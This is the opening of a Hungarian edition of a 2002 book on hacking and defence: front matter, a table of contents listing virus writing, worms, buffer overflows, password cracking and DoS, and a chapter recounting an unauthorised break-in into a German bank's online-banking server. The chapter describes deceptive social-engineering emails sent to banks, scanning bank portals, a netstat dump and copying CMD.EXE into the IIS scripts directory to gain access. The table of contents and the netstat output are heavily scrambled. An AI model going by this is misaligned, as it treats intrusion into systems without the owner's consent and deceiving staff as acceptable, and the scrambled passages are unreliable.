Thomas Vosseberg

Feltörés kontra védelem
Fontos figyelmeztetés!
A szerző a könyv teljes tényanyagát a legnagyobb gonddal dolgozta ki, illetve állította össze, és hatékony ellenőrzések mellett készítette. A hibák ennek ellenére sem zárhatók ki, ezért a kiadó és a szerző kénytelenek felhívni a figyelmet arra, hogy hibás közlésekre visszavezethető következményekért sem garanciát, sem jogi vagy bármilyen értelemben vett felelősséget vagy jótállást nem vállalnak. Az internetcímek vagy a verziószámok a szerkesztés lezártakor rendelkezésre álló állapotot tükrözik. A kiadó és a szerző semmilyen felelősséget vagy garanciát nem vállal a változásokért, amelyek tőlük függetlenül fellépő körülményekből adódnak. Az esetleg letöltésre kínált fájok és információk kizárólag nem üzleti felhasználásra szolgálnak. Üzleti felhasználás csak a licenctulajdonos beleegyezésével lehetséges. © 2002 Franzis1 Verlag GmbH, 85586 Poing © 2002 Computer Panoráma, 1091 Budapest, üllői út 25. Felelős kiadó: Dely Tamás ügyvezető igazgató Felelős szerkesztő: Horváth Annamária Fordította: Murányi Eszter Tervezőszerkesztő: Dancs Katalin Címlapterv: Szincsák László Minden jog fenntartva. Jelen könyvet, illetve annak részeit tilos reprodukálni, adatrendszerben tárolni, bármely formában vagy eszközzel - elektronikus, fényképészeti úton vagy más módon - a kiadó engedélye nélkül közölni. A kötetet készítette: Levilágítás: HVG Press Nyomtatás és kötés: Szegedi Kossuth Nyomda Kft. 6723 Szeged, Makkosházi krt. 1. Felelős vezető: Gera Imre ügyvezető igazgató
ISBN: 963 7639 225

Tartalom
1. A BANK-HACKELÉS 1.1 A feladat 1.1.1 Feltételek 1.1.2 A megoldáshoz vezető út 1.2 Hozzáférési út - információszerzés a Social Engineering módszerrel 1.3 A megfelelő cél keresése 1.3.1 Takarékpénztárak - túl sok szerverellenőrzés 1.3.2 Kutatás: IIS szerver kerestetik 1.3.3 Az operációs rendszer és a tranzakciós szoftver 1.3.4 Hogyan védik a szervert? 1.3.5 Nincsenek logfájlok - ezt biztosan az OFX irányítja 1.3.6 Adatátadás scriptekkel 1.3.7 Az adatletöltés 1.4 Utóirat a bank-hackeléshez 1.5 Összefoglalás 1.6 Sajtóbeszámolók 1.7 Tapasztalatok más bankoknál 1.7.1 Forgatókönyv a takarékpénztár-területen 2. A WINDOWS-RENDSZEREK (9X, NT, 2000) GYENGE PONTJAI 2.1 A hackeren túl - merevlemez-fejreállás, adatbetekintés vagy lopás 2.1.1 Különbségek a Windows 9x, az NT és utódai között 2.1.2 A fizikai támadás 2.1.3 Képernyővédő - jelszó - a bennfenteseknek nem okoz problémát 15 16 16 17 18 20 20 21 22 23 26 26 28 29 29 30 33 33 37 38 39 39 42

2.1.4 Automatikus lejátszás - a betörés előkészítése CD-vel
2.2 A jelszavak kikémlelése 2.2.1 Érdekes jelszavak szinte mindenütt akadnak

44
47 47

2.2.2 A jelszófájlok
2.2.3 Jelszavak a Windows 2000 alatt 2.3 A távoli elérésű támadás - internet- vagy hálózati felhasználók, vigyázat! 2.3.1 A fájl- és nyomtatómegosztás - veszélyes biztonsági rések 2.3.2 Mik azok a szkennerek, és hogyan működnek? 2.3.3 Milyen lehetőségeik vannak a betolakodóknak?

49
51 52 53 54 56

2.3.4 2.3.5

Jelszóval védett megosztások BruteForce-rohamok a megosztási jelszavak ellen

57 57
58 59

2.3.6 Óvintézkedések 2.4 További támadási technikák 3. ALAPOK

3.1 Az anonim Internetezés csökkenti a kockázatot 3.1.1 A legtöbb felhasználó sokat elárul 3.1.2 Névtelenül
3.2. A TCP/IP 3.2.1 Mi a TCP/IP?
3.2.2 Különböző protokollok a rétegekben 3.3 Néhány alkalmazás és protokoll használata és a biztonságosságuk 3.3.1 A Telnet

61 62 63 65
68 68
70 80 81

3.3.2 Az FTP 3.3.3. Az IRC
3.3.4 3.4 4. 4.1 4.2 4.2.1 Az IP-címzés Aportokról A TRÓJAIAK A történelmi minta Miből áll egy trójai? A szerver kiosztása

82 84
85 87 91 92 92 93

4.2.2 4.2.3 4.3 4.3.1 4.3.2 4.3.3 4.3.4 4.3.5 4.3.6 4.3.7 4.4 4.4.1 4.5 4.5.1 4.6 4.6.1 4.6.2 4.6.3 4.6.4

A kliens otthon marad, és vezérli a szervert Hogyan szerzik meg a hackerek az IP-t? így álcázzák és terjesztik a trójaiakat A trójaiakat fájlokba integrálják Álcázás a WinZip-pel. A trójaiakat az ICQ-val is tovább lehet adni Elég egy CD és az automatikus lejátszás funkció A lemezek majdnem ugyanígy működnek További terjesztési stratégiák Mit csinálnak a hobby-hackerek a trójaiakkal? Sub7 - egy trójai rémisztő lehetőségekkel Támad a Sub7 BackOrifice 2K - Hálózati eszköz vagy támadás a Microsoft ellen A BO2K és összetevői így ismerjük fel a trójait a rendszerünkben Vírus- és trójai-szkenner AutoRun bejegyzések Windows-Registry - ez már izgalmas Módszerek az Explorer.exe-vel a C:\ meghajtóra

94 95 96 96 97 98 99 100 100 101 102 103 105 106 107 107 108 109 112

4.6.5
5.

A runonce.exe kicserélése
VÍRUSOK - VESZÉLYES FÁJLOK

112
113
115 116 117 117 117 118 118 119 119 119 121 121 122 122 122 124 124 124 125 125

5.1 Alapok 5.1.1 Defektes cluster mint álcázás 5.1.2 Miről ismeri fel a vírusvizsgáló a vírust? 5.1.3 Videokártyák - az elvetemült támadók búvóhelyei? 5.2 A vírus felépítése 5.3 Hogyan fertőz meg a vírus egy fájlt? 5.3.1 így fertőznek a bootszektor vírusok 5.3.2 A dropper vírust helyez el 5.4 A legfontosabb vírustípusok rövid áttekintése 5.4.1 Bootszektor vírusok 5.4.2 Companion vírusok 5.4.3 Killerprogramok 5.4.4 Logikai bombák 5.4.5 Makrovírusok 5.4.6 Hálózati vírusok 5.4.7 Polimorf vírusok 5.4.8 Stealth vagy rejtőzködő vírusok 5.4.9 A TSR fájlvírusok 5.4.10 Update vírusok 5.4.11 Férgek - az ILOVEYOU és társai

5.4.12 Időzítők
5.5 Word makrovírus írása 5.5.1 Minden ténykedés központja - a Normal.dot fájl 5.5.2 Modul vagy osztálymodul? 5.5.3 Vírusok kontra ServiceRelease 5.5.4 Modul makrók 5.5.5 Ilyet is lehet: a vírus egy Payload-ot hív meg 5.5.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg 5.5.7 A vírus jelszóval védi a fájlt 5.6 Megfertőzött osztálymodulok

126
126 126 127 127 127 131 132 133 133

5.7

ILOVEYOU

137
138 138 140 140 149 149 150

5.7.1 Mi az a féreg? 5.7.2 A működési mód 5.7.3 Hogyan tudott a féreg elterjedni? 5.7.4 A forrás - kommentárokkal 5.8 Hogyan működnek a vírusvizsgálók? 5.8.1 Szkennermodul 5.8.2 Víruspajzs

3 TCP-FIN-Scan 6.1 Hogyan lehet ezt kihasználni? 165 167 168 168 170 172 174 175 176 181 182 182 184 184 187 188 189 190 190 191 192 192 192 193 195 196 197 197 197 197 198 .4.4.2.1 Az operációs rendszer memóriakezelése 11.8 DDoS .1 7.2.1 Mi az a sniffer? 9.4 Land támadások 10.2.1 Mailbombák .1 Szöveg 11.4.2.4 „Fertőtlenítő" A vírusvédő program kiválasztásának a szempontjai 150 150 6. BUFFER-OVERFLOW 11.4 Mit lehet tenni a snifferek ellen? 10.1 Az IP-spoofing mint előfeltétel 10. 7.9 Fragmentált szkennelés UDP-lCMP-Port-Unreachable szkennelés UDP-Recvfrom-And-Write szkennelés ICMP-echo-scanning/ping-szkennelés A nyitott portok csak a kezdetet jelentik A portszkennelés elleni védelem 154 154 154 155 155 155 152 7.8 6.2 Szkennelési eljárások 6.1 Szkennelés teljes TCP-kapcsolattal 6.2 7.8.6 A jelszófájl 8.2.2 A Buffer-Overflow-támadások 11.5.2 Hogyan működik egy sniffer? 9.8.2.9 Védelem a DoS-támadások ellen 11. SZKENNELÉS .túlcsordul a postafiók 8.2 7.5 6.4.7 6.Distributed Denial of Service támadások 10.2 Félig nyitott TCP-szkennelés 6.1.1.6 6.1.A RÉSEK KERESÉSE 151 152 153 153 153 6.4.6 Ping-Flodding 10.7 Smurf 10.5 JELSZÓFELTÖRÉS Hackelt security-site . SNIFFER 9.5 TCP-Syn-Flooding 10.a „nuken" 10.1.4 7.2.1. A szkenner 6. TÁMADÁSOK AZ INTERNET-FELHASZNÁLÓK ELLEN 8.3.1.2 7.1 E-mail-támadások 8.2. A DENIAL OF SERVICE TÁMADÁS 10.1 Az ICQ .2.4 7.2 Milyen biztonsági rések vannak? 9.2 Out-of-Band csomagok .2 ICQ .2.3 7.3 5.1 7.1.3.3 Astack (magyarul: halom/rakás) 11.biztonsági kockázat? 8.jelszófeltöréssel ez is lehetséges Mire kell ügyelni a felhasználói oldalról? A jelszófeltörők Ismert felhasználói nevek jelszavainak a kitalálása A beállítások egy áttekintésben Jelszavak megfejtése a John the Ripperrel Single Mode A szólista módszer Incremental mód Extemal mód A John legfontosabb parancsai 157 158 160 161 162 162 163 163 164 164 165 165 7.3 A sniffer veszélyei 9.2 A fájlmelléklet kitömése 8.3 A ConCon bug 8.2.3 Large Packet-támadások avagy a Ping of Death 10.1 7.2.4.3 7.2 Adatok 11.praktikus és veszélyes 8.4 6.

3 Minek kell a Shellcode változónál állnia? 11.5 Defacement .1 Egy desktop tűzfal megtámadása 13.cgi 12.1.4.3 Tűzfal-koncepciók 13.2 A Buffer-Overflow-k és a tűzfalak 199 202 208 209 211 212 212 12.5 Milyen védelmi mechanizmusok vannak? 11.2 Látogatásszámláló résekkel .1.2 Védelem 12.2. TŰZFALAK 13.6 Hogyan védhetjük meg a webszervert? 225 226 227 229 13.1 A tűzfal biztonsági szempontból fontos összetevői 13.1 A tűzfal feladatai 13.1.count.2 Desktop tűzfalak 13.5.2 A tűzfalak kategóriái 13.3 BBS biztonság 12.4 Jelszóval védett webterületek megtámadása 12.1.2 Hitelkártya fake-ek 12.3 Áldozat a Buffer-Overflow-kért 11.1 Összefüggés a CPU és a Buffer-Overflow között 11.4 Honnan lehet felismerni a Buffer-Overflow-t? 11.1 CGI-scriptek biztonságossága 12.1.2.a „script kidek" nemzeti sportja 12.2 Védelem a desktop tűzfallal 231 232 233 234 235 236 237 239 240 .4 Hogyan ismeri fel a támadó a tűzfalat? 13.4.1 A CGI további ismert gyenge pontjai 12.11.2.2.5. BIZTONSÁG A WEBEN 213 214 217 221 221 222 224 12.1.2 Hogyan működik? 11.1 Védelem 12.

......... Ki kellett kémlelni az adatokat..2 A megoldáshoz vezető út. • Trójai elhelyezése a homebanking-ügyfeleknél......21 1.1 Feltételek A feladat természetesen bizonyos feltételekhez volt kötve. s az ARD Technikai Tanácsadó műsor keretében kellett ellenőrizni.3 Az operációs rendszer és a tranzakciós szoftver 22 1...............2 A megoldáshoz vezető út A dolog a következőképpen zajlott: 1........ mennyire biztonságos manapság az online banki ügyintézés Németországban.........? 1................ nehogy az érintett bank az adás sugárzása előtt ideiglenes intézkedéseket tegyen...3......... Az érintett intézmény a „betörés" hatására ugyan változtatott online banking rendszerén.......6 Adatátadás scriptekkel....... A támadás visszhangja a könyv szerzőjére nézve mindenképpen pozitív volt..jogi megfontolásokból ......2 Kutatás: IIS szerver kerestetik .......... 26 1...... Ez azt jelentette.......1 A feladat 2001 júniusában érdekes feladatot kapott egy fiatal hacker-csoport: banki rendszereket és elektronikus kártyákat kellett tesztelniük... 1............. 3. Meg kellett találni a hozzáférési utat az adatokhoz vagy a szerverhez....1 Feltételek......3.. a bank nevét a szerzők ...............7 Az adatletöltés. • A bank online rendszerét nem lehetett sem zavarni. Két lehetséges indítás jutott a csoport eszébe: • Az intézmény webszerverének a megtámadása......3...... amelyeket a homebanking során végrehajtanak? Van-e lehetőség.... 2...3...33 1 A bank-hackelés Rövid ideig az érdeklődés középpontjába került egy különös támadás egy németországi bankszerver ellen.....30 Tapasztalatok más bankoknál........ Manipulálni kellett a tranzakciókat. hogy megakadályozza a hiányosság nyilvánosságra kerülését....1. A biztonság kérdését kétféleképpen lehetett megközelíteni: « Mennyire védettek az ügyfelek adatai..20 1........16 1.........1 Forgatókönyv a takarékpénztár-területen...... 28 Utóirat a bank-hackeléshez 29 Összefoglalás.16 1. • Mindennek észrevétlenül kellett történnie....23 1.1....... amelyről ebben a fejezetben írunk.........1 Takarékpénztárak-túl sok szerverellenőrzés..3.........letakarták..... átirányítani stb................. fejezet ................ hogy az végrehajthatatlanná váljon.. sem korlátozni a működésében...1........29 Sajtóbeszámolók. manipulálni....Tartalom A feladat..ezt biztosan az OFX irányítja ............................. Ezek közé tartoztak: « Egyeden ügyfelet sem érhet kár.. Be kellett törni a rendszerbe.......17 Hozzáférési út ... adatokat lekérdezni. .1........ 4.........1.. hogy egyetlen tranzakciót sem lehetett úgy manipulálni vagy hamisítani..7. és fel kellett deríteni a manipulációs lehetőségeket.. 1.... vannak-e lehetőségek betörni egy banki szerverbe? • Mennyire biztonságosak a tranzakciók..... ám mivel a potenciálisan fenyegető károk még most is jelentősek lehetnek..... csak a bank jött ki rosszul az ügyből........ így a támadás ennek a könyvnek a megjelenésekor már nem ismételhető meg.....................3.....5 Nincsenek logfájlok .........információszerzés a Social Engineering módszerrel___18 A megfelelő cél keresése..........20 1.............33 1..........4 Hogyan védik a szervert?..3...... ......... és ezt követően a banki szerver megtámadása a ........ 26 1.

A mailt úgy kellett megírni. enged át kéréseket. A Cisco router mögött még egy exkluzíván az XY bank számára installált. és csak a szűrőszabályok (csak HTTPS elérések engedélyezettek) teljesülése esetén továbbítja az online banki rendszer webszerverére.kikémlelt ügyféladatokkal. aki hallott egy másik bank webszerverét ért hackertámadásról. és az internetről jövő kapcsolattól fizikailag elválasztott kapcsolatot állít elő a webszerverhez úgy. Ezt a mailt elküldték 10 nagy német pénzintézetnek. vagy pedig gyanút fog. és csak az exkluzíván az online banki rendszer elé kapcsolt pluggateway-en. amelyben ügyfélnek adták ki magunkat. Intrusion Detection System is található. hogy valójában mennyire van biztonságban ennek az intézménynek a pénze.információszerzés a Social Engineering módszerrel Mindenekelőtt személyes kapcsolatokon keresztül próbáltak információkat szerezni a bankszerverről. Az egyszerűbb természetesen a régi jó trójaihoz való visszanyúlás lett volna: néhány PC-t kikémlelni. integrált tűzfallal.2 Hozzáférési út . hogy semmilyen visszacsatolás nem lehetséges kívülről a külső rendszerre. és azt sem tudták. Ráadásul egy ilyen indítást állandóan felügyelni is kell. a szerzőket is meglepve. lecsapni. Azonban a saját ügyféltanácsadót kérdezgetni bankja szerverének részleteiről nem túl szerencsés. nem utolsósorban a (német) Btk. 1. hogyan is védi a bank az online ügymenetet és az ügyfelek adatait. Több banknak e-mailt írtak. és végezetül szenvtelenül megkérdezték. a következő feladatokat látja el: Az internetkapcsolat és a webszerverhez kapcsolódás fizikai szétválasztása: egy külső rendszertől induló kapcsolat felépítésénél átveszi a kapcsolatot. A plug-gateway. A megfelelő lehetőséget tehát csak egy pénzintézet webszerverének a feltörése jelenthette. amely naplózza. amikor az ügyfél online intézi banki ügyeit. Más megoldást kellett tehát találni. amelyek online portált működtetnek. hogy egyszer azért megpróbálkoznak vele. hogyan is néznek ki pontosan a banki rendszerek. mint nálunk. 1. amelyeket nyugodtan fel lehet mutatni. hiszen talán csak kisebb hiányosságokra bukkannak. Körülbelül 5 nap és 9 „Aggodalomra semmi ok. amely a Cisco router és a bank szervere között található. Először tájékozódni kellett a banki struktúráról. Az infrastruktúra Az XY bank online banki rendszerének infrastruktúrája a következők szerint van kiépítve: Valamennyi online banking megkeresés egy Cisco routeren keresztül érkezik. A plug-gateway tűzfala minden csomagot analizál. át kell játszani nekik egy trójai vírust. Éppen ezért hálózattech-nikailag jártasnak mutatták magunkat. az alábbi mail érkezett. Ez természetesen heves vitákat váltott ki. jelzi és vissza is veri a rendszer elleni támadásokat. hiszen többnyire maga sem tud róla semmit. hogy aligha lehetne végrehajtani a tulajdonképpeni tesztet. és most tudni akarja a saját bankjáról. installálni kell a trójait stb. amely csak a 443-as portot (HTTPS-kódolású adatátvitel SSL-lel) bocsátja rendelkezésre. §-aira való tekintettel. Továbbá az . Az ÖN XY bankja." típusú szabványmail után. a pénze sehol sincs nagyobb biztonságban. hiszen a kikémlelés után várni kell az első homebanking tranzakcióra. Először tehát információkat kellett gyűjteniük. 202. Így az ügyfelek banki adatainak az átvitele az online banking oldal betöltésétől kezdve biztonságos és kódolt. és 263. hogy a felépítése miatt ne tudjanak egy szabvány ügyfélszolgálati szöveggel válaszolni rá. illetve védett-e az online banki szolgáltatása. majd a megfelelő pillanatban. S ha egy ilyen akció kitudódna. annak olyan sajtóviszhangja lenne. Néhány terepkísérlet után azonban ez a lehetőség a hajánál előrángatottnak tűnt. Természetesen egyik résztvevőnek sem volt pontos koncepciója. Ügyfeleket kell találni. Végülis arra a döntésre jutottak.

Az adminisztrátor 2001. hogy további információkat tudjunk meg a rendszerről (hardver. Hannoverben található. és ki lehetett indulni abból.ostspa. továbbra is tisztázatlan. hogy nincsenek-e esetleg kódolva ezek stb. Itt van példának a www. és ott úgy változtatják meg a login-oldalakat. arra a módszerre amelynek révén részletes bepillantást nyerhettek a banki webszerver biztonsági intézkedéseibe.finommunkák Ami a mail-bői nem derült ki.túl sok szerverellenőrzés A német takarékpénztárak az infrastruktúrára vetett rövid pillantás után kiestek. később) eredményeként már világos volt: minden bank különböző pénzügyi szoftvereket használ. 3. Ez egy jól sikerült példa volt a Social Engineeringre.3. Egy támadás itt egy kicsit melegnek tűnt. hogy az adminek „a gépen ülnek". az online banki rendszer csak HTTPS-en keresztül (443. 2. miközben ez a szerver a DVG-nél. nem sikerült. 1. a következő cím alatt fut: https://ww2. például az OFX-et (Open Financial Exchange). biztonságos internet-eléréssel érhető el. ám az onlinebanking egy számítógépközponton keresztül zajlik. mert például Hannoverben majdnem minden takarékpénztárat ÉszakNémetországból hostolnak. Mivel a keresett formátumból tulajdonképpen nem sok volt. hóban maga hajtott végre szkennelést a nyitott internetfellépés és a bank online rendszere ellen. azzal kezdhettek. hogy csak egy bank login oldaláról juthatnak hozzá az ügyfelek adataihoz. havi biztonsági analízise A rendszeradminisztrátor 2001. Mint várható. Részletek a szerverekről . melyik bank legyen az? 1.hotnebanking-mecklenburgvorp. Miután ezekről a szerver-kliens szoftverekről csak szűkös információkat találtak. szerver stb. Takarékpénztárak .cgi/Ostseespk_Rostock. A kérdés csak az volt. A PIN-ek kódolva vannak tárolva az adatbázisban. azonban néhány szkennelés (közelebbit ld.06. A hackeléshez tulajdonképpen csak egy Microsoft HS-szerver jöhetett szóba. Az volt ugyanis a probléma velük. 06. amelynek a szervere közvetlenül csatlakozik az online banking-hez.de. így az adatbázist egyáltalán nem lehet közvetlenül elérni az internetről.1. port) a 128 bites kódolású. de a tulajdonképpeni oldal. A kísérlet. 1.adatbázis szerver fizikailag el van választva a webszervertől és az alkalmazástól.3 A megfelelő cél keresése Az ötlet tehát az volt. és már egy tesztcélú szkennelés is figyelmet keltene. hogy ugyan majdnem minden takarékszövetkezetnek van saját weboldala. operációs rendszer. és kezelik a további ügyfélinformációkat. Ezek gondoskodnak a számlaszámok és a PIN-ek belépő ellenőrzéséről. Ennek az oldalnak a szervere Schwerinben van. Még ha lehetséges is lenne adatokhoz jutni az OFX-adatbázisból. világossá vált a számukra. hogy minden egyes bankot megvizsgáltak. A részletes információk szkennelése . Szkenneltek néhány bankot. hogy lássák a szervereiket.3. és semmilyen visszacsatolást nem engednek meg a valójában felhasznált PIN-re. Biztonság Az infrastruktúra (hardver és rendszerszoftver szinten) megfelelő védettsége érdekében még a következő biztonsági intézkedéseket tettük az online banki ügyintézésnél: A kliens és a szerver közötti kapcsolat 128 bites maximális kódolással épül fel. Ez a szabvány az internetes tranzakcióknál biztonságos.). ahol az ügyfelek a számlájukhoz férnek. hogy keresnek egy nagyobb bankot.2 Kutatás: US-szerver kerestetik így tehát inkább a nagyobb bankokra kellett összpontosítani.de/cgi/anfang. hogy minden bevitel egy log-fájlba vándoroljon.

4. Ellenőrizni. amely a parancsok dekódolását érintette. 3. hogy megtalálják a betörésre alkalmas rendszert. amelyen keresztül úgy a bank.az előkészítés feltételei A cél optimálisnak tűnt.Itt láthatók az infók a felhasznált szerverekről A szkennelő program segítségével különböző bankportálokat vizsgáltak.4 Hogyan védik a szervert? Úgy tűnt. egy portált. 1. tökéletesen elegendő volt. Kikutatni az adatátvitelt. Hitelesíteni. hogy sikerrel járnak. így az oldal elérési számainak is magasnak kellett lenniük. fejezetben részletesen is olvashatnak. A program szállította a legfontosabb információkat az egyes bankok és takarékpénztárak webszer-vereiről. 5. mint magáé a rendszeré.) Napokig tartó szkennelés után találták meg a ••• oldalt. A támadáshoz a következő lépéseket kellett végrehajtani: 1. amely e bank mellett szólt. (A szkennelés témájáról a 6. Tivoli Management Software-rel karbantartva (amelynek a hibáiról lehetett már hallani)! De ezt ezen a szerveren nem ellenőrizték. A bank minden szakembere az új projekten dolgozik. mert egy végzetes rés a IIS-en. úgy az oldalé. 1. mert nem válaszolt a pingekre. Utólagos becslések szerint az említett szám 5000 és 9000 között mozgott óránként. Tesztelni az exploitokát. mert e bank ügyfeleinek egész Németországban erről a portálról kellett bejelentkezniük. Egy további érv. 6. így a webszerver megtámadásának az időpontja több mint ideális. Ellenőrizni a védelmi mechanizmusokat.3.3 Az operációs rendszer és a tranzakciós szoftver Egy NT-webszerver IIS 4. a szerver tervezett átépítése volt. Feltérképezni az operációs rendszert és a tranzakciókhoz használt szoftvert. hogy vannak-e logfájlok információkkal. Tehát abból indulhattak ki.0-val. mint egy leányvállalat. 2. A cél ismertetőjegyei . és kapcsolatokat sem engedett meg . a szervert tűzfal védi. a ••• ügyfelei be tudtak login-olni.3. lehetséges. és a még futó régi rendszert „elhanyagolják".

0. xx:3125 172.0.211:4232 62.209.0.0.0.0.xx: 139 1 72.101.24.0.0.0:1031 0.209.0.1 58.0.0.0:0 0.0.0.0.xx:80 193.0:0 0.0.2.0:0 0.158.0:0 0.0.0.0:0 0.0.xx:138 1 72.27.153. 209.0.0.24.158.158.0.xx:80 193. milyen tűzfalról volt szó.213:1233 62.0.0.158.1 58.3:1036 62.0.152.24.xx:443 193.1:1025 127.213:1235 62.0:0 0.0.0.197.46.0.213:1237 62.0:0 0.158.0.xx:80 193.0.0.4:1557 212.xx6. intranet kapcsolatból indulhattak ki.0.27.0:0 0.158.24.158.213:1238 Prot.0.0:0 0.0:0 Állapot LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING ESTABLISHED LISTENING LISTENING ESTABLISHED LISTENING LISTENING LISTENING LISTENING ESTABLISHED TIME_WAIT ESTABLISHED TIME_WAIT TIME_WAIT LISTENING TIME_WAIT TIME_WAIT ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED LISTENING LISTENING LISTENING LISTENING CLOSING TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TC P TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0.0:3128 0.0.xx:443 193. 158.xx:80 193.158.130.5:1435 0. Íme a netstat-jelentés: Prot.0.0.24.0.xx:443 193.0.209.0.0:0 0.191:1042 212.130.153.158.0.0:0 0.209.0:3125 0.24.0.0:5044 127.213:1234 62.0.153.209.0.24.130.0.0.0:2874 0.206.27.144:1073 217.24. Mivel a távoli számítógépet egy komputernévvel jelölték.0.xx:3126 172.197.0:0 172. port) és a HTTPS-en (443.0.0.0.0.158.0:0 0.209.27.xx:443 Távoli címek 0.0:0 0.xx:80 193.xx:80 193.0.209.0.0.0.1:1025 127.xx:138 193.0. 209.1:1028 127.209.xx:80 193.61:1119 212.1:1031 1 72.24.xx: 1029 172.158.0.130.0.27.0.0:3037 0.0.24.27.0.0.1 52.0:3038 0.130.0.209.xx:31 11 172.0.0.0.0:0 62.0.27.0.xx6.0.0.0:2882 0.209.0. xx:443 193.0:0 62.0:0 0. A szkennelések során nem derült ki pontosan.0.0.0.209.xx:443 193.0:0 0.130.0:0 0. mert a netstat-jelentés 4:00 óra körül kapcsolatokat mutatott a 4966/4967 portra.153.0.xx:443 193.27.0.0.209.0.0.166.0.0.209.0:0 0.158.166. xx:3038 1 72.4.0.1:1031 0.209.0:0 0.0:1037 0.0:512 0.0:0 0.0.0.0.157.0. TCP Helyi címek 193.4:80 172.158. 152.0.0:4796 0.0.209. 133.xx:3127 193.24.5:1435 172.24.0.152.0. és azt sem lehetett megmondani.xx:443 Távoli címek 62.209.0.236:57480 193.0:0 0.158.158.kifelé.0:3489 0.0.0:0 127.0. 152.0:1027 0. 152.0.211:4233 62.0.0.0.xx:80 193.xx: 137 172.0.0.197.27.0:0 127.0.0.158.xx:139 193.153.0. 152. de ezt kizárni sem lehetett.209.0.0. 152.213:1236 62.0.5:1435 172.158.0:135 0.0. port) kívül más portok elérése is megengedett-e.xx:80 193.xx:443 193.0.24.0.0.0:0 0.0:0 0.0:4487 0.0.0:0 0.133:4233 0.24.0:0 0.xx:80 193.0:135 0.145.46.1:1025 0. hogy a webszolgáltatón (80.1:1026 127.0.0:0 0.0.213:1240 Állapot TIME_WAIT .130.0:161 0.0:0 0.0.0.209.4:80 172.0.0.158.0.0.0:3111 0.0.0. 152.0.xx:137 193.0:0 0.0:3697 0.158.130.209.0.158.0.0:2867 0.0:3168 0.0.213:1182 62. Helyi címek TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0.209.

158.xx:443 193.0.209.59.158. sem a C:\WINNT\ system32\LogFiles könyvtárban. 209.130.158.1 58.3:1042 62.158.158.209.3:1044 62.27.xx:3121 193.19.158.27.209. a PIN és a felhasználó által megadott TAN az OFX-hez továbbítódik. Természetesen pontosan megnézték.209.209.19.213:1245 62.xx:3128 209. Az OFX-et az ASP-oldalakról .158.24.209. Ebből továbbra is arra következtettek.27.3.3:1039 62. illetve kezeli az OFX szoftver.xx6.xx: 1030 193.xx:1030 62.209. 1.xx:138 1 72.0:135 0.11. 152.153.1 58.3:1040 62.19. hogy működőképesen legyen kezelhető a .130.xx: 11 94 62.vezérlik.0.27.xx:443 193.27.158.27.158.xx:1186 62.209.0.TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP UDP UDP DP UDP UDP UDP UDP UDP 193.56.209.158.209.158.27.158.xx:443 *:* *:* *:* *:* *:* *:* *:* TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT ESTABLISHED CLOSING TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT CLOSING TIME_WAIT ESTABLISHED CLOSING LISTENING ESTABLISHED *:* 1.xx:443 193.xx: 1029 193.158. Találtak viszont OFX-szoftver-jelentéseket.209.xx:443 193.xx:443 193. xx:1277 193.54.209.xx:443 193. vagy teljesen lemondanak a loggolásról! Az OFX-ről A szerveren sem folyószámla-adatokat.158.xx:443 193.209. és ott hasonlítják össze.24.152.130.xx:443 193. 209.xx:1185 62.xx:137 193.amelyek szokatlan módon nem VB scripteket. a felhasználói adatokat egy adatbázisba küldik.24.5 Nincsenek logfájlok ezt biztosan az OFX irányítja IIS logfájlokat egyáltalán nem találtak. 209. 154.27.158.27.209. sem máshol.0.xx:1182 62. xx:443 193.209. A parancsfordító CMD. amelyek azonban nem adtak információt a kapcsolatokról.158.158.27.27.xx:443 193. Feltételezték.xx:443 193.213:1247 62.3.153.xx:443 193.130.209.27.0.209.209.xx:443 193.56.130. 152. Tehát a tranzakcióknál a tranzakciók számai.213:1241 62. hogyan is fogadja és továbbítja a rendszer az adatokat bejelentkezéskor. xx:443 193. 209.xx:138 193.158.158.xx:443 193.xx:443 193.209.xx:443 193.xx6.24.130. 209.209.EXE-t a webszerver rendszerkönyvtárából a script-könyvtárba másolták.xx:443 193.158. és ezt éri el.152. amely aztán visszaadja a hibakódokat.xx: 1202 0.3:1037 62.xx:443 193.158.152.158.0. sem adatbázis-jelszavakat vagy hasonlókat nem találtak. hogy vagy a tűzfal log-okat értékelik ki.1 58.xx:443 193.1 58.0:0 193.24.209.209.158. Előkészületek (hozzáférés megszerzése) A megfelelő URL megadásával elérték a hozzáférést.xx6. milyen módon lehetne megtámadni a szervert.158.0:161 172.xx6.209.xx:443 193.3:1038 62.1 58.xx6. és az adatokat nem lokálisan ellenőrzik.6 Adatátadás scriptekkel A szkennelés után világos lett. hanem JAVA scripteket használnak .27.xx6.209.xx6.27.xx:443 1 93.153.209.xx:3128 0.xx:443 193.213:1246 62.153.xx6.xx:443 193.213:1244 62.xx:443 193.xx:2326 63.xx:1184 62.165.xx6.1 58.27.213:1242 62.158. hogy ezeket központilag tárolják egy számítógépen.3:1041 62.19.130.xx:137 172.209.3:1043 62.213:1243 62.

